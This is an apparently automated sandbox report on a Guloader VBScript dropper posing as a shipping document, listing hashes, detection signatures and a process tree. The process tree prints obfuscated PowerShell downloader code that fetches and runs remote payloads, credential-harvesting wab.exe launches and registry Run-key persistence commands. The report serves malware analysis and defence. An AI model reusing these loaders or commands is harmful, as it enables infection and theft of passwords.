Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
-
submitted
25-06-2024 11:16
General
-
Target
awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbs
-
Size
187KB
-
MD5
71e6ad71e4958df129a87422066d1be1
-
SHA1
75e5f0176d44782d874e74411d72ec5dbe86660c
-
SHA256
b30bb2c67741afe2a5173337bd2acab5785c408cce2fbb84dc07a3c904f3f3c6
-
SHA512
c6217bdc6b15046be438f7367c28b4a1dded02181a0e0579ceba297b0e4cdf4b7256b0ed1e8cada6cb3555bd344d739b166b269b68a05f2e6c391d997b1d7832
-
SSDEEP
3072:fmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZV:f08GxbKja3+DCbKCvBB/WnHXC/sLJFJ4
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Nirsoft 3 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
-
Suspicious behavior: MapViewOfSection 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 59 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Abstractionist Nondeclarative Logikanalysatorer105 Dogmatikkers Skovdistrikts Storhedstidernes Unroyalized Sapid Downpour Bnkebidere Afhvledes Tsumebite Hydrohematite Achilleine Adverseness Vivas Udtalt75 Epharmony Ggebger Familieplanlgningens210 Grimrianer81 Domstolene Sidenumres Kommaterede Abstractionist Nondeclarative Logikanalysatorer105 Dogmatikkers Skovdistrikts Storhedstidernes Unroyalized Sapid Downpour Bnkebidere Afhvledes Tsumebite Hydrohematite Achilleine Adverseness Vivas Udtalt75 Epharmony Ggebger Familieplanlgningens210 Grimrianer81 Domstolene Sidenumres Kommaterede';$Formueoverfrsler = 1;Function Tonalt($Stersfart){$Kines=$Stersfart.Length-$Formueoverfrsler;$fljlskjolers='SUBSTRIN';$fljlskjolers+='G';For( $Fejlvurderingens=1;$Fejlvurderingens -lt $Kines;$Fejlvurderingens+=2){$Abstractionist+=$Stersfart.$fljlskjolers.Invoke( $Fejlvurderingens, $Formueoverfrsler);}$Abstractionist;}function Outleaped($Mntvaskerierne){ . ($Donna122) ($Mntvaskerierne);}$Damnonii=Tonalt ' M o.zLi.l l a,/,5P. 0. (.WSiHn d.o,w s, N T S1 0S.,0 ; WWFiSn 6G4P; x 6F4 ; TrGv : 1.2 1 .B0 ) G e,c k oT/G2M0 1H0.0P1N0 1E CF i,r eAf.oTx / 1 2 1P.S0F ';$Lovede=Tonalt 'IUGsBe rt-.A,g,e nTt, ';$Skovdistrikts=Tonalt 'GhAt t pYs,: /r/Berv,o lDuNxVc,o.nUt a b.iHl.iBd,aSdDeJ.UcHo m .pbKrN/.R,UIS,/ BUl.oAt,l,gSg.eTrB.Sm i,x >EhStnt p :,/f/B1U9 4H.a5A9 . 3 1..T1M3 7O/ BDl oLtOlSg gAe rJ. m iLx ';$mossbacks=Tonalt 'P> ';$Donna122=Tonalt 'bi e xS ';$Steek='Sapid';$Tastaturteksts = Tonalt 'we cCh o .%AaHpUpCd.a.tVa % \RRByOtAm,ePnU. Fia e & & BeBc hAo MtA ';Outleaped (Tonalt 'W$,gOlloRb aMl.:,I dSepnOt iAf.i kKaSt,i o n,sNp aUpUi rDe r n.e = ( c.m d /BcS $LTBaUsSt a tbu r,t.e,kSs.tAsA). ');Outleaped (Tonalt ' $Cg l,o b,aIlE:UD oOg m,aStKiHk kEeGr,s =E$,SVk o vfd iIs tSr i kEt.sS.Vs pElUi.tW(,$mmPoHsKssb a.c kUs )J ');Outleaped (Tonalt ' [ NFeAtS.ASSeDr.v iBcBeJP oCi,nTt M.aTn aSgTe.rU].:U: S e cvu rHi t yTPIrSoLt.oPc oFlA =, m[dN,ePt,.ASJe.cTuSrSi.t.yyP rKo t,o c oSl,TMy,pSeM].:.:uTGlBs 1O2 ');$Skovdistrikts=$Dogmatikkers[0];$raptorial= (Tonalt 'H$mgAl,oAb.a l : O pStShCa l m.o lFoFg i,cB=DNEeUwF-AO b jMegcLt S.yRsLtCe,m...NAeFt .RWPeBbICClTi.eSn.t');$raptorial+=$Identifikationspapirerne[1];Outleaped ($raptorial);Outleaped (Tonalt 'E$SO pNtHhPa.lfm o.lBo g iWcR. HTeTaMdAeDrUsX[A$SLmoMv eed eV] =S$KDKa.m,nIo nUi iH ');$Stableness=Tonalt ' $ OipCtOh aJl m o l o,gFi cI. DFoEwkn l o a dGF iRl e.(O$ SDkPoSvSd.i s,tAr iAkPtBsM, $DDRoFmDs,t o lMe,n e )O ';$Domstolene=$Identifikationspapirerne[0];Outleaped (Tonalt ' $,gUl oSbAa ls:IL,aMnCcSa s.tUeFrBiLa n =b( T.eHs,t,-MP aDt,h s$ D o mEsSt,o l e,n e ) ');while (!$Lancasterian) {Outleaped (Tonalt 'M$.g l o,b a.lM: mRiLsFdGeBn t,i t iAo n,= $St,rEu.e. ') ;Outleaped $Stableness;Outleaped (Tonalt '.S tfaBr tU-.S l eKe pE ,4m ');Outleaped (Tonalt 'S$ gClPo,b aRlS:MLLa nOcHa sPt.eHr,i aLn =,(NT e s tS-LPAa t h. $.D oEm,sct o l e n eA), ') ;Outleaped (Tonalt ' $.g,lRoMbPaOl : LGoDg iHkRa n a,lMyKsQa tPoHrOe rG1 0A5R=s$ g l,o,b a l,:PNSoSnHd e cGl aSrPaNt i v.e,+V+ %.$FD.o g m a t,iPk,k.eFr s . cHoSu nSt ') ;$Skovdistrikts=$Dogmatikkers[$Logikanalysatorer105];}$Massacrous=384112;$Overdistantly=26637;Outleaped (Tonalt 'D$KgPl otb aTl :PD oSwDn.p o,u,r, ,= EG,e t,- C,oHn tSe n tU .$ D.o,m s tRoPl.eRn,ea ');Outleaped (Tonalt ' $LgVl.oAbSaCl :.P lra,t.f,oEr mEeRdT C=. [.SDySs,tAeImG. CBonnRv eCrStP] :N:AF.r oCmABCa.sce 6A4SSTt r iCnAgH( $BD oAw n p oFuGr.), ');Outleaped (Tonalt 'O$Ug lAoFbSaAl,:PTRs.u m eRbCi t eF =V S[ SKyFsMt eDm,. T e.xCt,. ELnTc,o.d i,nFgU]O: :.A.S,CHI I .MG eHtVSTtcr iMnEg (R$FP.l a tsf o rSm e,d ) ');Outleaped (Tonalt 'F$Dg l oKb atlC: T u.b eYr,kVuPl.oCs e,s,t.aFtMi o.n e.n,=.$,T.s uUmle b.iEtEeP.IsVuObhs t rOiTnRgS(T$ MSaDsBs,aBcLrAo.u,s , $,O vge rAdSiAsRt aun tOlNy,)T ');Outleaped $Tuberkulosestationen;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rytmen.Fae && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Abstractionist Nondeclarative Logikanalysatorer105 Dogmatikkers Skovdistrikts Storhedstidernes Unroyalized Sapid Downpour Bnkebidere Afhvledes Tsumebite Hydrohematite Achilleine Adverseness Vivas Udtalt75 Epharmony Ggebger Familieplanlgningens210 Grimrianer81 Domstolene Sidenumres Kommaterede Abstractionist Nondeclarative Logikanalysatorer105 Dogmatikkers Skovdistrikts Storhedstidernes Unroyalized Sapid Downpour Bnkebidere Afhvledes Tsumebite Hydrohematite Achilleine Adverseness Vivas Udtalt75 Epharmony Ggebger Familieplanlgningens210 Grimrianer81 Domstolene Sidenumres Kommaterede';$Formueoverfrsler = 1;Function Tonalt($Stersfart){$Kines=$Stersfart.Length-$Formueoverfrsler;$fljlskjolers='SUBSTRIN';$fljlskjolers+='G';For( $Fejlvurderingens=1;$Fejlvurderingens -lt $Kines;$Fejlvurderingens+=2){$Abstractionist+=$Stersfart.$fljlskjolers.Invoke( $Fejlvurderingens, $Formueoverfrsler);}$Abstractionist;}function Outleaped($Mntvaskerierne){ . ($Donna122) ($Mntvaskerierne);}$Damnonii=Tonalt ' M o.zLi.l l a,/,5P. 0. (.WSiHn d.o,w s, N T S1 0S.,0 ; WWFiSn 6G4P; x 6F4 ; TrGv : 1.2 1 .B0 ) G e,c k oT/G2M0 1H0.0P1N0 1E CF i,r eAf.oTx / 1 2 1P.S0F ';$Lovede=Tonalt 'IUGsBe rt-.A,g,e nTt, ';$Skovdistrikts=Tonalt 'GhAt t pYs,: /r/Berv,o lDuNxVc,o.nUt a b.iHl.iBd,aSdDeJ.UcHo m .pbKrN/.R,UIS,/ BUl.oAt,l,gSg.eTrB.Sm i,x >EhStnt p :,/f/B1U9 4H.a5A9 . 3 1..T1M3 7O/ BDl oLtOlSg gAe rJ. m iLx ';$mossbacks=Tonalt 'P> ';$Donna122=Tonalt 'bi e xS ';$Steek='Sapid';$Tastaturteksts = Tonalt 'we cCh o .%AaHpUpCd.a.tVa % \RRByOtAm,ePnU. Fia e & & BeBc hAo MtA ';Outleaped (Tonalt 'W$,gOlloRb aMl.:,I dSepnOt iAf.i kKaSt,i o n,sNp aUpUi rDe r n.e = ( c.m d /BcS $LTBaUsSt a tbu r,t.e,kSs.tAsA). ');Outleaped (Tonalt ' $Cg l,o b,aIlE:UD oOg m,aStKiHk kEeGr,s =E$,SVk o vfd iIs tSr i kEt.sS.Vs pElUi.tW(,$mmPoHsKssb a.c kUs )J ');Outleaped (Tonalt ' [ NFeAtS.ASSeDr.v iBcBeJP oCi,nTt M.aTn aSgTe.rU].:U: S e cvu rHi t yTPIrSoLt.oPc oFlA =, m[dN,ePt,.ASJe.cTuSrSi.t.yyP rKo t,o c oSl,TMy,pSeM].:.:uTGlBs 1O2 ');$Skovdistrikts=$Dogmatikkers[0];$raptorial= (Tonalt 'H$mgAl,oAb.a l : O pStShCa l m.o lFoFg i,cB=DNEeUwF-AO b jMegcLt S.yRsLtCe,m...NAeFt .RWPeBbICClTi.eSn.t');$raptorial+=$Identifikationspapirerne[1];Outleaped ($raptorial);Outleaped (Tonalt 'E$SO pNtHhPa.lfm o.lBo g iWcR. HTeTaMdAeDrUsX[A$SLmoMv eed eV] =S$KDKa.m,nIo nUi iH ');$Stableness=Tonalt ' $ OipCtOh aJl m o l o,gFi cI. DFoEwkn l o a dGF iRl e.(O$ SDkPoSvSd.i s,tAr iAkPtBsM, $DDRoFmDs,t o lMe,n e )O ';$Domstolene=$Identifikationspapirerne[0];Outleaped (Tonalt ' $,gUl oSbAa ls:IL,aMnCcSa s.tUeFrBiLa n =b( T.eHs,t,-MP aDt,h s$ D o mEsSt,o l e,n e ) ');while (!$Lancasterian) {Outleaped (Tonalt 'M$.g l o,b a.lM: mRiLsFdGeBn t,i t iAo n,= $St,rEu.e. ') ;Outleaped $Stableness;Outleaped (Tonalt '.S tfaBr tU-.S l eKe pE ,4m ');Outleaped (Tonalt 'S$ gClPo,b aRlS:MLLa nOcHa sPt.eHr,i aLn =,(NT e s tS-LPAa t h. $.D oEm,sct o l e n eA), ') ;Outleaped (Tonalt ' $.g,lRoMbPaOl : LGoDg iHkRa n a,lMyKsQa tPoHrOe rG1 0A5R=s$ g l,o,b a l,:PNSoSnHd e cGl aSrPaNt i v.e,+V+ %.$FD.o g m a t,iPk,k.eFr s . cHoSu nSt ') ;$Skovdistrikts=$Dogmatikkers[$Logikanalysatorer105];}$Massacrous=384112;$Overdistantly=26637;Outleaped (Tonalt 'D$KgPl otb aTl :PD oSwDn.p o,u,r, ,= EG,e t,- C,oHn tSe n tU .$ D.o,m s tRoPl.eRn,ea ');Outleaped (Tonalt ' $LgVl.oAbSaCl :.P lra,t.f,oEr mEeRdT C=. [.SDySs,tAeImG. CBonnRv eCrStP] :N:AF.r oCmABCa.sce 6A4SSTt r iCnAgH( $BD oAw n p oFuGr.), ');Outleaped (Tonalt 'O$Ug lAoFbSaAl,:PTRs.u m eRbCi t eF =V S[ SKyFsMt eDm,. T e.xCt,. ELnTc,o.d i,nFgU]O: :.A.S,CHI I .MG eHtVSTtcr iMnEg (R$FP.l a tsf o rSm e,d ) ');Outleaped (Tonalt 'F$Dg l oKb atlC: T u.b eYr,kVuPl.oCs e,s,t.aFtMi o.n e.n,=.$,T.s uUmle b.iEtEeP.IsVuObhs t rOiTnRgS(T$ MSaDsBs,aBcLrAo.u,s , $,O vge rAdSiAsRt aun tOlNy,)T ');Outleaped $Tuberkulosestationen;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rytmen.Fae && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Faarehovedernes" /t REG_EXPAND_SZ /d "%Soberlike% -w 1 $Paraplasis=(Get-ItemProperty -Path 'HKCU:\Presentationes\').Fyrvrkeres;%Soberlike% ($Paraplasis)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Faarehovedernes" /t REG_EXPAND_SZ /d "%Soberlike% -w 1 $Paraplasis=(Get-ItemProperty -Path 'HKCU:\Presentationes\').Fyrvrkeres;%Soberlike% ($Paraplasis)"6⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\cuql"5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mpvdrxv"5⤵
- Accesses Microsoft Outlook accounts
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\prbwrqouch"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Poodle.vbs"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"8⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"10⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\09B406FB8A13DE24E07EA97DC21FE315Filesize
504B
MD5acde2ebd73bf401c166d86a7e31406b0
SHA12ded266e34831ec8ba306a323424dd9209c49c59
SHA2562d775df3e298eca8eea960c3a3ceaa0f055977ef26eb16ec36dc443a8243c49b
SHA51218e3fa8c897cdb13ac76e06431dcf8a45d83438b296635c47b3f55d8a5b626fb54e8fcce05067fba415846d2652c14a4c1c194ec3878093713ab8e693b3a6d9b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
